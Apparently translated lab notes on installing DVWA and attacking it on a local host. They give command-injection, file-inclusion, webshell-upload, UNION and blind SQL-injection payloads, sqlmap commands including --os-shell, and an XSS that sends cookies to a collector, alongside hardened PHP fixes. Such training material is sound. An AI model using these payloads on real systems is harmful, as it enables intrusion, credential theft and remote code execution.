wget https://github.com/ethicalhack3r/DVWA/archive/master.zip
or http://www.dvwa.co.uk/
mv master.zip /var/www/html/
rm -r DVWA-master/
unzip master.zip
II. Environment setup
service apache2 stop
chmod -R 777 /var/www/html/DVWA-master
service mysql start
mysql -u root -p    (open the MySQL shell)
create database dvwa;
exit    (leave MySQL)
service apache2 start
vi /var/www/html/DVWA-master/config/config.inc.php.dist    (edit the DVWA config file)
cp /var/www/html/DVWA-master/config/config.inc.php.dist /var/www/html/DVWA-master/config/config.inc.php
rm /var/www/html/DVWA-master/config/config.inc.php.dist
apt-get install php-mysql php php-pear    (install the PHP environment; verified on Kali 2018.1)
If you run into the problems below:
Problem: PHP function allow_url_include: Disabled
Fix: edit php.ini and change allow_url_include from Off to On
vi /etc/php/7.0/apache2/php.ini
That still did not clear it, so I located every php.ini and changed them all:
vi /etc/php/7.2/apache2/php.ini
vi /var/www/html/DVWA-master/php.ini
Problem: PHP module gd: Missing
Fix: apt-get install php7.0-gd
Note that this is the 7.0 package; installing the 7.2 one still left the warning.
Problem: reCAPTCHA key: Missing
Fix: edit dvwa/config/config.inc.php and set
$_DVWA[ 'recaptcha_public_key' ] = '6LdK7xITAAzzAAJQTfL7fu6I-0aPl8KHHieAT_yJg';
$_DVWA[ 'recaptcha_private_key' ] = '6LdK7xITAzzAAL_uw9YXVUOPoIHPZLfw2K1n5NVQ';
Problem: Unable to connect to the database
Fix: edit dvwa/config/config.inc.php and change $_DVWA[ 'db_password' ] to the password of your own database root account. That did not work for me either; digging through the DVWA help docs turned up the following (pitfalls everywhere...):
First log in as root;
exit, then log in as dvwa;
Done; one screenshot to mark the occasion;
III. Hands-on practice
1. Brute force
High level: how to fetch the usertoken parameter automatically
2. Command injection:
Checks:
Does the page call a system command?
Is the function or parameter user-controllable?
Can the controllable parameter be used to chain on another command?
Chaining: ping 127.0.0.1&&net user
Medium: ping 127.0.0.1&net user
High: ping 127.0.0.1|net user
TIPS: A&B    simple chaining
A&&B    B runs only after A succeeds
A|B    A's output becomes B's input
A||B    B runs only if A fails
Tricks:
What if a blacklist filters the command?
Windows:
who""ami
who""am""i
Linux:
who''am''i
What if nothing is echoed back?
Time-based injection:
Windows:
ping 127.0.0.1 -n 5>nul
Linux:
sleep 5
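As an added example (not DVWA's own source), this is what a hardened version of the "ping a user-supplied host" handler behind the exercise above looks like: an allow-list check on the input first, then shell quoting as defence in depth. The chained payloads listed above are used as constructed test inputs.

```php
<?php
// Added example, not DVWA's code. Two layers of defence for a ping handler:
// 1. the value must be a literal IP address (rejects '&', '|', ';', spaces);
// 2. escapeshellarg() as defence in depth before anything reaches a shell.

function is_safe_ping_target(string $ip): bool
{
    // FILTER_VALIDATE_IP accepts only a well-formed IPv4/IPv6 literal,
    // so "127.0.0.1&&net user" and friends fail before any command runs.
    return filter_var($ip, FILTER_VALIDATE_IP) !== false;
}

function ping_host(string $ip): string
{
    if (!is_safe_ping_target($ip)) {
        // Log the rejected value (hex-encoded, so the log itself stays clean)
        // and never echo the raw input back into the page.
        error_log('rejected ping target: ' . bin2hex($ip));
        return 'invalid address';
    }
    $quoted = escapeshellarg($ip);              // defence in depth
    $cmd = (stripos(PHP_OS, 'WIN') === 0)
        ? 'ping ' . $quoted
        : 'ping -c 4 ' . $quoted;
    return shell_exec($cmd) ?? '';
}

// Constructed inputs mirroring the chained payloads discussed above.
$probes = [
    '127.0.0.1',
    '127.0.0.1&&net user',
    '127.0.0.1&net user',
    '127.0.0.1|net user',
];
foreach ($probes as $p) {
    printf("%-22s %s\n", $p, is_safe_ping_target($p) ? 'accepted' : 'rejected');
}
```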
3. CSRF
Medium: the Referer must contain the host
High: csrf_token, which the attacker does not know
4. File inclusion:
The filename parameter is user-controllable and poorly filtered, so an attacker can swap in malicious code and achieve code execution
PHP setting:
enable allow_url_include &
Leak the site path:
http://192.168.126.128:8081/DVWA/vulnerabilities/fi/?page=test.php
C:\phpStudy\WWW\DVWA\vulnerabilities\fi\index.php
Test file inclusion:
http://192.168.126.128:8081/DVWA/vulnerabilities/fi/?page=../../phpinfo.php
http://192.168.126.128:8081/DVWA/vulnerabilities/fi/?page=../../../phpinfo.txt    (if the file contains PHP code it is executed)
Medium:
http://192.168.126.128:8081/DVWA/vulnerabilities/fi/?page=..\..\..\phpinfo.txt
http://192.168.126.128:8081/DVWA/vulnerabilities/fi/?page=http://..\..\..\phpinfo.txt    (surprising bypass)
http://192.168.126.128:8081/DVWA/vulnerabilities/fi/?page=httphttp://://192.168.126.128:8081/phpinfo.txt
High:
Leak the site path:
http://192.168.126.128:8081/DVWA/vulnerabilities/fi/?page=file1111.php
Bypass with the file:// protocol:
http://192.168.126.128:8081/DVWA/vulnerabilities/fi/?page=file://C:\phpStudy\WWW\phpinfo.txt
http://192.168.126.128:8081/DVWA/vulnerabilities/fi/?page=file:///../../../phpinfo.txt
http://192.168.126.128:8081/DVWA/vulnerabilities/fi/?page=file:///../../../../../1.txt
http://192.168.126.128:8081/DVWA/vulnerabilities/fi/?page=file://c:/1.txt
TIPS: the file protocol cannot execute code remotely; it has to be combined with a file upload vulnerability: upload a PHP file, then include it locally
5. File upload:
Concept: the web app lets a user upload a file containing malicious code, and then executes it
Function: upload("hello.php")
Test: http://192.168.126.128:8081/DVWA//hackable/uploads/2p.jpg
low: http://192.168.126.128:8081/DVWA/hackable/uploads/shell.php
http://192.168.126.128:8081/DVWA/hackable/uploads/shell.php?cmd=system('ipconfig');
http://192.168.126.128:8081/DVWA/hackable/uploads/shell.php?cmd=system('type c:\\windows\\win.ini');
medium: Content-Disposition: form-data; name="uploaded"; filename="shell.php"
Content-Type: image/jpeg
high: restricts not only the type but also the size
Build an image with an embedded payload:
copy C:\Users\Administrator\Desktop\2.jpg/b+C:\Users\Administrator\Desktop\2.txt/a C:\Users\Administrator\Desktop\3.jpg
Exploit through file inclusion:
http://192.168.126.128:8081/DVWA/vulnerabilities/fi/?page=file://C:\phpstudy\www\DVWA\hackable\uploads\3.jpg
Exploit the nginx parsing vulnerability: cgi.fix_pathinfo=1
http://192.168.126.128:8081/DVWA//hackable/uploads/2.jpg
http://192.168.126.128:8081/DVWA//hackable/uploads/2.jpg/2.php    executed as PHP
Fixes:
Block illegal file uploads:
  file extension whitelist
  file type matching
  check the file content header
Block illegal file execution:
  rename the file
  recompress and regenerate the file
  set execute permissions on the storage directory
  separate the storage directory from the web root
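An added example (not DVWA's code) of an upload handler that applies the fixes listed above in one place: extension whitelist, MIME type read from the bytes rather than the client's Content-Type header, re-encoding through GD so an image with an appended payload like 3.jpg loses its tail, a random server-side name, and storage in an assumed directory outside the web root (/var/uploads).

```php
<?php
// Added example, not DVWA's code. Assumes /var/uploads exists, is writable
// by the web server, and is NOT under DocumentRoot (files are served by name
// through a script, never executed from the upload directory).
const UPLOAD_DIR = '/var/uploads';
const MAX_BYTES  = 1024 * 1024;                       // 1 MiB size cap
const ALLOWED    = ['jpg' => 'image/jpeg', 'png' => 'image/png'];

function store_image(array $file): ?string
{
    if ($file['error'] !== UPLOAD_ERR_OK || $file['size'] > MAX_BYTES) {
        return null;
    }
    // 1. Extension whitelist. The client-supplied name is untrusted and is
    //    used only to pick a known extension; it never becomes the path.
    $ext = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));
    if (!isset(ALLOWED[$ext])) {
        return null;
    }
    // 2. MIME type from the actual content, not from the Content-Type header
    //    that the "medium" bypass above simply rewrote to image/jpeg.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    if ($mime !== ALLOWED[$ext]) {
        return null;
    }
    // 3. Re-encode through GD: only pixel data is written back out, so a
    //    jpg+txt polyglot produced with "copy /b ... + ... /a" loses its payload.
    $img = ($ext === 'png')
        ? @imagecreatefrompng($file['tmp_name'])
        : @imagecreatefromjpeg($file['tmp_name']);
    if ($img === false) {
        return null;                                   // not a decodable image
    }
    // 4. Random server-side name: the attacker never chooses path or extension.
    $name = bin2hex(random_bytes(16)) . '.' . $ext;
    $dest = UPLOAD_DIR . '/' . $name;
    $ok = ($ext === 'png') ? imagepng($img, $dest) : imagejpeg($img, $dest, 90);
    imagedestroy($img);
    return $ok ? $name : null;
}

// Form field name matches the DVWA upload form ("uploaded") shown above.
if (isset($_FILES['uploaded'])) {
    $stored = store_image($_FILES['uploaded']);
    echo $stored !== null ? "stored as $stored" : 'upload rejected';
}
```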
6. SQL injection:
Command injection: system commands
SQL injection: SQL statements, manipulating the database
Echoing SQL injection: the injection result is displayed on the page
low:
http://192.168.126.128:8081/DVWA/vulnerabilities/sqli/?id=1' or '1'='1&Submit=Submit#
TIPS: three MySQL comment styles
#    comments out the rest of the line; usually URL-encoded as %23
--     comments out the rest of the line (dash dash space)
/* ... */    inline comment; /**/ is often used in place of a space
Determine the number of columns:
http://192.168.126.128:8081/DVWA/vulnerabilities/sqli/?id=1' order by 2-- &Submit=Submit#
Determine the echo points: both 1 and 2 are echoed
http://192.168.126.128:8081/DVWA/vulnerabilities/sqli/?id=xx' +union+ select+ 1,2-- +&Submit=Submit#
First tries:
http://192.168.126.128:8081/DVWA/vulnerabilities/sqli/?id=xx' +union+ select+ version(),@@datadir-- +&Submit=Submit#
http://192.168.126.128:8081/DVWA/vulnerabilities/sqli/?id=xx' +union+ select+ user(),database()-- +&Submit=Submit#
Query table names:
http://192.168.126.128:8081/DVWA/vulnerabilities/sqli/?id=xx' +union+ select+ 1,table_name from information_schema.tables where table_schema='dvwa'-- +&Submit=Submit#
Query column names:
http://192.168.126.128:8081/DVWA/vulnerabilities/sqli/?id=xx' +union+ select+ 1,column_name from information_schema.columns where table_name='user'-- +&Submit=Submit#
Query usernames and passwords:
http://192.168.126.128:8081/DVWA/vulnerabilities/sqli/?id=xx' +union+ select+ user,password from users-- +&Submit=Submit#
Read host information:
http://192.168.126.128:8081/DVWA/vulnerabilities/sqli/?id=xx' +union+ select+ load_file('c:\\phpinfo.txt'),load_file('c:\\windows\\win.ini')-- +&Submit=Submit#
Leak the site path:
http://192.168.126.128:8081/DVWA/vulnerabilities/sqli/?id=xx' +union+ select+ "xx","xx" into outfile 'xx'-- +&Submit=Submit#
C:\phpStudy\WWW\DVWA\vulnerabilities\sqli\source\low.php
Write a webshell:
http://192.168.126.128:8081/DVWA/vulnerabilities/sqli/?id=xx' +union+ select+ "","webshell" into outfile 'C:\\phpStudy\\WWW\\DVWA\\cmd.php'-- +&Submit=Submit#
Run the webshell:
http://192.168.126.128:8081/DVWA/cmd.php?cmd=system('dir');
sqlmap:
sqlmap.py -u "http://192.168.126.128:8081/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit#" -p "id" --cookie "security=low;PHPSESSID=5dp4gbopsdj77kmkjfd9p1fsq5"
sqlmap.py -u "http://192.168.126.128:8081/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit#" -p "id" --cookie "security=low;PHPSESSID=5dp4gbopsdj77kmkjfd9p1fsq5" --current-user --current-db
sqlmap.py -u "http://192.168.126.128:8081/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit#" -p "id" --cookie "security=low;PHPSESSID=5dp4gbopsdj77kmkjfd9p1fsq5" -D dvwa --tables
sqlmap.py -u "http://192.168.126.128:8081/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit#" -p "id" --cookie "security=low;PHPSESSID=5dp4gbopsdj77kmkjfd9p1fsq5" -D dvwa -T users --columns
sqlmap.py -u "http://192.168.126.128:8081/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit#" -p "id" --cookie "security=low;PHPSESSID=5dp4gbopsdj77kmkjfd9p1fsq5" -D dvwa -T users -C "user,password" --du
sqlmap.py -u "http://192.168.126.128:8081/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit#" -p "id" --cookie "security=low;PHPSESSID=5dp4gbopsdj77kmkjfd9p1fsq5" --os-shell
C:\phpStudy\WWW\DVWA
medium: single quotes are escaped
POST submission
modify id with Tamper Data
Determine the injection PoC:
id=1 or 1=1    √
id=1" or "1"="1    ×
id=1' or '1'='1    ×
tips: use hex encoding to bypass the single-quote escaping
id=1 union select 1,table_name from information_schema.tables where table_schema='dvwa'    ×
id=1 union select 1,table_name from information_schema.tables where table_schema=0x64767761    √
sqlmap:
sqlmap.py -u "http://192.168.126.128:8081/DVWA/vulnerabilities/sqli/" --data "id=1&Submit=Submit#" -p "id" --cookie "security=low;PHPSESSID=5dp4gbopsdj77kmkjfd9p1fsq5"
high: the injection point and the output point are not on the same page
poc: id=1' or '1'='1'--
sqlmap:
sqlmap.py -u "http://192.168.126.128:8081/DVWA/vulnerabilities/sqli/session-input.php" --data "id=1&Submit=Submit#" -p "id" --cookie "security=high;PHPSESSID=5dp4gbopsdj77kmkjfd9p1fsq5" --second-order "http://192.168.126.128:8081/DVWA/vulnerabilities/sqli/"
Fixes:
parameterised SQL statements
pre-compiled statements with the id bound as a variable
filter user input
whitelist
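An added example (not DVWA's source) showing the two fixes above combined for the id lookup behind vulnerabilities/sqli/: an input whitelist, then a pre-compiled mysqli statement with id bound as an integer, so the PoCs from this section never become part of the SQL text. It assumes DVWA's users table (user_id, first_name, last_name) and the connection details from config.inc.php (user dvwa, password p@ssw0rd are placeholders to replace with your own).

```php
<?php
// Added example, not DVWA's own code. Whitelist + prepared statement for the
// "id" lookup; the connection settings below are assumptions for a lab box.
mysqli_report(MYSQLI_REPORT_ERROR | MYSQLI_REPORT_STRICT);

function lookup_user(mysqli $db, string $rawId): ?array
{
    // Whitelist: the only valid shape is a small positive integer, so
    // "1' or '1'='1", "0x64767761" and "1 union select 1,2" stop here.
    if (!ctype_digit($rawId) || strlen($rawId) > 9) {
        return null;
    }
    $id = (int) $rawId;

    // Pre-compiled statement: the query text is fixed at prepare() time and
    // $id travels to the server as data, never as SQL.
    $stmt = $db->prepare(
        'SELECT first_name, last_name FROM users WHERE user_id = ?'
    );
    $stmt->bind_param('i', $id);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    $stmt->close();
    return $row ?: null;
}

// Assumed lab credentials; replace with the values from config.inc.php.
$db = new mysqli('127.0.0.1', 'dvwa', 'p@ssw0rd', 'dvwa');

// Constructed probes taken from the PoCs discussed in this section.
foreach (['1', "1' or '1'='1", '0x64767761', '1 union select 1,2'] as $probe) {
    $row = lookup_user($db, $probe);
    printf("%-22s -> %s\n", $probe, $row ? $row['first_name'] : 'rejected');
}
```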
7. Blind SQL injection:
Concept: the query result is not displayed directly on the page; the page only shows one of two states, true or false
Types:
Boolean-based
Three injection PoCs: true and false = false
id=1 and 1=2
id=1' and '1'='2
id=1" and "1"="2
Blind injection approach:
1' and true    -> true
1' and false    -> false
SQL functions:
Guess the length:
length(str);
Get a substring:
substr(expression,start,length)
Get the ASCII value of the first character (0-127):
ascii(string)
Determine the string length:
1' and length(database())>4 --
Extract the string:
1' and ascii(substr(database(),1,1))>64 --
ascii 100 = d
1' and ascii(substr(database(),2,1))>64 --
v
1' and ascii(substr(database(),3,1))>64 --
w
1' and ascii(substr(database(),4,1))>64 --
a
database()='dvwa'
Time-based:
SQL functions:
if(expr1,expr2,expr3)
returns expr2 if expr1 is true, otherwise expr3
sleep(N)
sleeps for N seconds
benchmark(count,expr)
evaluates expr repeatedly, count times
Determine the length:
1' and sleep(if(length(database())=4,5,0))--
result true: the response comes back after 5 seconds
1' and sleep(if(length(database())=5,5,0))--
result false: the response comes back immediately
or
1' and benchmark(if(length(database())=4,500000,0),md5('test'));--
runs md5 500000 times, taking about 1 s
1' and benchmark(if(length(database())=5,500000,0),md5('test'));--
returns immediately
sqlmap:
sqlmap.py -u "http://192.168.126.128:8081/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit#" -p "id" --cookie "security=low;PHPSESSID=5dp4gbopsdj77kmkjfd9p1fsq5" --current-db -v 3
Functions:
cast(expression as data_type)
type conversion, e.g. hexadecimal to string
ifnull(expr1,expr2)
returns expr2 if expr1 is null, otherwise expr1 itself
select ifnull(null,'test');
returns test
select ifnull(cast(database()as char),0x20);
returns dvwa
mid(expr,start,length)
get a substring
ord(string)
get the ASCII value of the first character
select ord(mid(database(),1,1));
returns 100
Approach:
1' and ord(mid((ifnull(cast(database()as char),0x20)),1,1))>64 and 1'='1
medium:
modify the packet with Tamper Data: 1 and 1=2
high: id is in the cookie
1' and '1'='2' --
sqlmap: cookie injection needs --level 2 or higher
sqlmap.py -u "http://192.168.126.128:8081/DVWA/vulnerabilities/sqli_blind/?" -p "id" --cookie "id=1;security=high;PHPSESSID=5dp4gbopsdj77kmkjfd9p1fsq5" --level 2
8. XSS attacks:
Stored XSS: the attack code sits in the database and is output in the HTTP response
Reflected XSS: the attack code sits in the URL and is output in the HTTP response
DOM-based XSS: the attack code sits in the URL and is output into a DOM node
JavaScript popup functions:
alert()
confirm()
prompt()
Reflected XSS:
low:
Test: name=
Set up a local server to receive the cookie
cookie.php
<?php
$cookie=$_GET['cookie'];
file_put_contents('cookie.txt',$cookie);
?>
Build the JS:
name=
URL-encoded:
name=%3Cscript%3Edocument.localtion%3D%27http%3A%2f%2f192.168.126.128%3A8081%2fcookie.php%3Fcookie%3D%27%2bdocument.cookie%3B%3C%2fscript%3E
Receive the cookie
medium:
name=
name=
high:
name=
name=